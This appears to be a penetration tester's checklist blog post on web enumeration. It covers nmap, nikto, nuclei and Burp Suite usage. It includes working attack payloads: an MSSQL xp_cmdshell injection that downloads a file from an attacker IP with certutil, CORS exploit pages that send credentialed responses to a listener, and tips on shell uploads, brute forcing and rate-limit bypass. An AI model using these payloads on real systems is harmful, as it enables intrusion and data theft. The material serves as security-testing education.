Web Page Enum - Port 80,443

Hello Minna-san, this post covers some basic Checks to be carried out while Penetration Testing web application, though it doesn't cover the exploitation part  yet. 

Simple Web Page Enum Checklist

Scan All the Ports via Nmap
Web Servers can be Found on any port 
nmap -Pn -p- 10.10.10.10
Check robots.txt 
Run nikto, dirb, dirsearch.py --> check large dictionaries 
nikto -h 10.10.10.10
dirb http://10.10.10.10
dirsearch.py -u http://10.10.10.10 -e *
CUPP -i 
Try to use all kinds of HTTP methods - GET,POST, PUT 
Try with curl -X put --upload-file <filename> <web server address>
Check for login pages, if found any - try to login with default creds. Send it to burp intruder/Turbo Intruder and brute force it
Check the CMS of the Application 
if its wordpress/ Drupal/ joomla run their specific scanners - wpscan, drupscan 
Try to login with default credentials - Use intruder / wpscan 
search for vulnerable plugins 
use CEWL to generate a list of passwords/usernames and emails
Check if the CMS version has any existing Vulnerabilities 
Intercept the request and see what's going on in the backend
In case, if you are able to login but do not have access to write in any of the page, upload a vulnerable plugin and exploit it 
After Authentication: if the OS is unknown, go to "TEMPLATE EDITOR" --> try uploading different kinds of shells --> php, PHP4, PHP5, php.png
Run sqlmap, w3af or any automated scanning on the application 
Check the webserver information using whatweb
whatweb 10.10.10.10
whatweb 10.10.10.0/16 --no-errors | grep -v Unassigned
Check the HTTP Response headers, you might see the application server information or the proxy information
Authenticated: Check for file uploads or any input fields 

Finding Vulnerabilities using Tools

Sn1per
Sn1per -t 10.10.10.10 -m vulnscan
Sn1per -t 10.10.10.10 -m webscan

Nuclei
Templates list: cves,vulnerabilities,exposed-panels,takeovers,exposures,technologies,misconfiguration,workflows,miscellaneous,default-logins,file,dns,fuzzing,helpers,iot,

#Update the templates
nuclei -update-templates

#Scan the taget using given templates
nuclei -t cves 10.10.10.10

#scan cves based on Severity
nuclei -t cves/ -severity critical -l <target-list>

#Scan all templates except a few
nuclei -l <target-list> -t nuclei-templates/ -exclude iot/ -exclude technologies


Nikto
nikto -h 10.10.10.10
nikto -h 10.10.10.10 -ssl


Joomla CMS
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl -u www.example.com --ec

If its a windows operating system and if you think there might be an sql injection, then database is MSSQL - You can try this exploit.

';EXEC xp_cmdshell 'any windows command'
';EXEC xp_cmdshell 'certutil -urlcatche -f http://IP_address/exploit.aspx';--

//In case you dont have enough privileges , try the beko
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

#Validating Webpages from Multiple IPs

nmap -Pn -p443 10.10.103.0/24 --open -oG https
grep ' 443/open/' https | cut -d' ' -f 2 | sort -uV > 443.txt
for i in $(cat 443.txt); do (wget  https://$i --no-check-certificate  --tries=1 -O $i) & done

for i in $(seq 1 255); do (curl -s -I -vv https://10.10.10.$i --connect-timeout  2)  done | tee 443

for i in $(seq 1 255); do (wget  https://10.10.10.$i -t 1 --connect-timeout=5); done | tee wget-443

HTTP Verb Tampering

#!/bin/bash

for webservmethod in GET POST PUT TRACE CONNECT OPTIONS PROPFIND;

do
printf "$webservmethod " ;
printf "$webservmethod / HTTP/1.1\nHost: $1\n\n" | nc -q 1 $1 80 | grep "HTTP/1.1"

done

#Nikto
for i in $(cat ips.txt); do (nikto -h $i -o $i -Format txt) & done

#SSLScan 

Burp Suite Tips 

- look for parameters (sitemap --> filter by parameter)
- Look for hideen fields. (proxy --> options --> Response modifications --> "unhide hidden form fields")
- Check Host Header injection
- Check for CORS 

Session handling with anti-csrf token:

capture the req --> 
project options --> Sessions -->Macros --> Add --> Select the url from HTTP history  --> hit "Configure this item' --> Under "Custom Parameter locations in response" click "Add" --> find the anti-csrf token from the page reponse under the dialogue box  and select it; it should automatically update the expression --> name the parameter (Exactly same as the anto-csrf parameter) and click "ok"  --> "Test macro" --> macro is now saved

Session handling Rules --> 'Add' a new rule --> "name" the rule --> under Rule Actions click 'Add' --> Select "Run a macro" --> select the macro that we created earlier. --> select "Update only the following parameters" & type the anticsrf parameter name that you are looking to update everytime; Click edit; enter the param name --> add --> close --> ok --> ok; you should see the new rule under session handling rules 

*Now whenever you run the url under repeater, anti-csrf token will update automatically *
 

Check for CORS 

Burp --> proxy --> options --> match & replace  --> Add --> 
Type: Request header 
Match: Origin: https://domain.com
Replace: Origin: https"//untrusted.domain.com 

--> ok 
Check the response for 'Access-Control-Allow-Origin'; if you find the untrusted.domain.com in response --> its vulnerable to CORS 

.204 No content status code --> Not Vulnerable  



Exploiting CORS

create a HTTPS Server using the script

<html>
  <body>
    <script>
        var req = new XMLHttpRequest();
        req.onload = reqListener;
        req.open('get','https://domain.com/CORS/issue',true);
        req.withCredentials = true;
        req.setRequestHeader('Origin','https://localhost')
        req.setRequestHeader('Cookie', 'user-token=COOKIE_VALUE');
        req.setRequestHeader('Access-Control-Request-Headers', 'content-type,x-requested-with');
        req.send().
        function reqListener() {
        location='https://localhost/log?key='+this.responseText;
        };
  </script>
  <body>
</html>



<html>
    <head></head>
    <body>
        <script>
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    var xhr2 = new XMLHttpRequest();
                    // attacker.server: attacker listener to steal response
                    xhr2.open("POST", "https://localhost", true);
                    xhr2.send(xhr.responseText);
                }
            };
            // victim.site: vulnerable server with `Access-Control-Allow-Origin: *` header 
            xhr.open("GET", "https://domain.com/asdsa", false);
            xhr.withCredentials = true;
            xhr.setRequestHeader('Origin','https://localhost')
            xhr.setRequestHeader('Cookie', 'user-token=');
            xhr.setRequestHeader('Access-Control-Request-Headers', 'content-type,x-requested-with');
            
            xhr.send();
        </script>
    </body>
</html>

Tips: 
-look for parameters (sitemap --> filter by parameter)
- Look for hideen fields. (proxy --> options --> Response modifications --> "unhide hidden form fields")
- Check for CORS origin (create a spoofed CORS using proxy --> options --> match & replace --> add 'Origin:' test.pentest.com)
- Try Injection on all Headers
- Send anticsrf tokens to sequencer
- Compare Site-maps for ACL's (Using Compare Sitemaps feature)
- Set burp proxy in ZAP outgoing proxy to view the OWASP ZAP data


Techniques:
Bypass Rate Limit: Add "X-Forwarded-For: 127.0.0.1" header in the request

You can also refer to This page covered most of the web attacks - Newbie pentest